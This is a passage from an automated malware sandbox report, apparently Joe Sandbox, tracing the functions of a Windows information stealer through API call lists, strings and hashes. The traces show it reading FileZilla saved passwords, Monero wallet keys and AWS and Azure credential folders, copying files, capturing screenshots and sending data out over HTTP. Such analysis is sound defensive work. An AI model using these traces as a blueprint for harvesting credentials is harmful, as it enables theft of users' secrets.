                                  • lstrcat.KERNEL32(?,00000000), ref: 00E70746
                                  • lstrcat.KERNEL32(?,00E81780), ref: 00E70755
                                  • lstrcat.KERNEL32(?,password: ), ref: 00E70764
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E70777
                                  • lstrcat.KERNEL32(?,00E81790), ref: 00E70786
                                  • lstrcat.KERNEL32(?,00E81794), ref: 00E70795
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E80DB7), ref: 00E707EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: 9586f2f0847b0613192b6adc4962e6d9ee0ae5d6b0f884d2d35e561910adb142
                                  • Instruction ID: 1df2983e5bd4fd307e1f487c0e1cfda0d2b1fdff60f62663f21afb7d0e2a6121
                                  • Opcode Fuzzy Hash: 9586f2f0847b0613192b6adc4962e6d9ee0ae5d6b0f884d2d35e561910adb142
                                  • Instruction Fuzzy Hash: F3D13172900208ABCB18FBF0DD56EEE77BDAF54300F149568F11A76095EF31AA45CB61
                                  Function 00E659B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                    • Part of subcall function 00E64800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E64889
                                    • Part of subcall function 00E64800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E64899
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E65A48
                                  • StrCmpCA.SHLWAPI(?,0173E308), ref: 00E65A63
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E65BE3
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0173E298,00000000,?,0173A0A0,00000000,?,00E81B4C), ref: 00E65EC1
                                  • lstrlen.KERNEL32(00000000), ref: 00E65ED2
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00E65EE3
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E65EEA
                                  • lstrlen.KERNEL32(00000000), ref: 00E65EFF
                                  • lstrlen.KERNEL32(00000000), ref: 00E65F28
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E65F41
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00E65F6B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E65F7F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E65F9C
                                  • InternetCloseHandle.WININET(00000000), ref: 00E66000
                                  • InternetCloseHandle.WININET(00000000), ref: 00E6600D
                                  • HttpOpenRequestA.WININET(00000000,0173E348,?,0173DAB0,00000000,00000000,00400100,00000000), ref: 00E65C48
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • InternetCloseHandle.WININET(00000000), ref: 00E66017
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: 5d32a74f9d69dfb11521923b16cd1da570a45cebbd5d701f4421550bc20f0af8
                                  • Instruction ID: dfbdf503edd63aa26ccf8d5e403ce39ba8bd83aaf80338a8953bca00b9275526
                                  • Opcode Fuzzy Hash: 5d32a74f9d69dfb11521923b16cd1da570a45cebbd5d701f4421550bc20f0af8
                                  • Instruction Fuzzy Hash: 4112EF72920118ABCB15EBA0DCA5FEEB3B9BF54700F1491A9F10E72091EF706A48CF55
                                  Function 00E6CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E78CF0: GetSystemTime.KERNEL32(00E80E1B,0173A010,00E805B6,?,?,00E613F9,?,0000001A,00E80E1B,00000000,?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E78D16
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E6D083
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E6D1C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E6D1CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D308
                                  • lstrcat.KERNEL32(?,00E81570), ref: 00E6D317
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D32A
                                  • lstrcat.KERNEL32(?,00E81574), ref: 00E6D339
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D34C
                                  • lstrcat.KERNEL32(?,00E81578), ref: 00E6D35B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D36E
                                  • lstrcat.KERNEL32(?,00E8157C), ref: 00E6D37D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D390
                                  • lstrcat.KERNEL32(?,00E81580), ref: 00E6D39F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D3B2
                                  • lstrcat.KERNEL32(?,00E81584), ref: 00E6D3C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E6D3D4
                                  • lstrcat.KERNEL32(?,00E81588), ref: 00E6D3E3
                                    • Part of subcall function 00E7AB30: lstrlen.KERNEL32(UO,?,?,00E64F55,00E80DDF), ref: 00E7AB3B
                                    • Part of subcall function 00E7AB30: lstrcpy.KERNEL32(00E80DDF,00000000), ref: 00E7AB95
                                  • lstrlen.KERNEL32(?), ref: 00E6D42A
                                  • lstrlen.KERNEL32(?), ref: 00E6D439
                                    • Part of subcall function 00E7AD80: StrCmpCA.SHLWAPI(00000000,00E81568,00E6D2A2,00E81568,00000000), ref: 00E7AD9F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E6D4B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: c6dce136c555c5676d9e8952d70ce06603ed6836c7476cda682768461a6d0f7d
                                  • Instruction ID: 854f6df4011a6bfc4c08e41950b19c90cdfdbb725b28f219642cd238f6c8c9d6
                                  • Opcode Fuzzy Hash: c6dce136c555c5676d9e8952d70ce06603ed6836c7476cda682768461a6d0f7d
                                  • Instruction Fuzzy Hash: 7BE13271910108ABCB18FBA0DD96EEEB3BDAF94301F149574F11A76095DF31AE48CB62
                                  Function 00E6CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0173C9C8,00000000,?,00E81544,00000000,?,?), ref: 00E6CB6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E6CB89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00E6CB95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E6CBA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E6CBD9
                                  • StrStrA.SHLWAPI(?,0173C7E8,00E80B56), ref: 00E6CBF7
                                  • StrStrA.SHLWAPI(00000000,0173C8D8), ref: 00E6CC1E
                                  • StrStrA.SHLWAPI(?,0173D560,00000000,?,00E81550,00000000,?,00000000,00000000,?,01738838,00000000,?,00E8154C,00000000,?), ref: 00E6CDA2
                                  • StrStrA.SHLWAPI(00000000,0173D580), ref: 00E6CDB9
                                    • Part of subcall function 00E6C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E6C971
                                    • Part of subcall function 00E6C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E6C97C
                                  • StrStrA.SHLWAPI(?,0173D580,00000000,?,00E81554,00000000,?,00000000,01738898), ref: 00E6CE5A
                                  • StrStrA.SHLWAPI(00000000,01738A98), ref: 00E6CE71
                                    • Part of subcall function 00E6C920: lstrcat.KERNEL32(?,00E80B47), ref: 00E6CA43
                                    • Part of subcall function 00E6C920: lstrcat.KERNEL32(?,00E80B4B), ref: 00E6CA57
                                    • Part of subcall function 00E6C920: lstrcat.KERNEL32(?,00E80B4E), ref: 00E6CA78
                                  • lstrlen.KERNEL32(00000000), ref: 00E6CF44
                                  • CloseHandle.KERNEL32(00000000), ref: 00E6CF9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 47ffb61d25e94babefba2e169c3b8d08b910c2a136dbcc8b6d8b0f8e8d931f8c
                                  • Instruction ID: d8ed2c62aae60509a519fc1bd9df543c492d08ae49cb4362f627e9cc6f9c8d7a
                                  • Opcode Fuzzy Hash: 47ffb61d25e94babefba2e169c3b8d08b910c2a136dbcc8b6d8b0f8e8d931f8c
                                  • Instruction Fuzzy Hash: 82E12371900108ABDB19EBA4DCA1FEEB7B9AF94300F1491B9F10A77195DF306A49CF61
                                  Function 00E784B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • RegOpenKeyExA.ADVAPI32(00000000,0173AE08,00000000,00020019,00000000,00E805BE), ref: 00E78534
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E785B6
                                  • wsprintfA.USER32 ref: 00E785E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E7860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E7861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E78629
                                    • Part of subcall function 00E7AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E7AAF6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: 1e6b2eb9428239c98bb96a21072354a7d300579ad87a12c5615aa994f014cec5
                                  • Instruction ID: 8ef271b0e6671a7dc074ab53eb4434cbae91a3899938f74256c3296a9197e330
                                  • Opcode Fuzzy Hash: 1e6b2eb9428239c98bb96a21072354a7d300579ad87a12c5615aa994f014cec5
                                  • Instruction Fuzzy Hash: 5881EC71911118ABDB28DB54CD95FEEB7B8BB58700F14D2E9E10EA6184DF706B84CFA0
                                  Function 00E791A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E791FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: `d$`d$image/jpeg
                                  • API String ID: 2244384528-3402243820
                                  • Opcode ID: 4f6089eff119f950b16f313759cebd7090d27424bb2bf1995920546488ae4ef7
                                  • Instruction ID: 48522c9d036c5b224b1cd9409776a2b020d2ddcde7dacbae8d9a463d571a7126
                                  • Opcode Fuzzy Hash: 4f6089eff119f950b16f313759cebd7090d27424bb2bf1995920546488ae4ef7
                                  • Instruction Fuzzy Hash: 1371E0B5A10208ABDB14DFE4DC85FEEB7B9BF48700F108558F516A7289DB74E944CB60
                                  Function 00E74FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E78F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E78F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E75000
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00E7501D
                                    • Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74B7C
                                    • Part of subcall function 00E74B60: FindFirstFileA.KERNEL32(?,?), ref: 00E74B93
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E7508C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00E750A9
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC4), ref: 00E74BC1
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E80FC8), ref: 00E74BD7
                                    • Part of subcall function 00E74B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00E74DCD
                                    • Part of subcall function 00E74B60: FindClose.KERNEL32(000000FF), ref: 00E74DE2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00E75118
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E75135
                                    • Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74C00
                                    • Part of subcall function 00E74B60: StrCmpCA.SHLWAPI(?,00E808D3), ref: 00E74C15
                                    • Part of subcall function 00E74B60: wsprintfA.USER32 ref: 00E74C32
                                    • Part of subcall function 00E74B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00E74C6E
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,0173E3B8), ref: 00E74C9A
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,00E80FE0), ref: 00E74CAC
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,?), ref: 00E74CC0
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,00E80FE4), ref: 00E74CD2
                                    • Part of subcall function 00E74B60: lstrcat.KERNEL32(?,?), ref: 00E74CE6
                                    • Part of subcall function 00E74B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00E74CFC
                                    • Part of subcall function 00E74B60: DeleteFileA.KERNEL32(?), ref: 00E74D81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
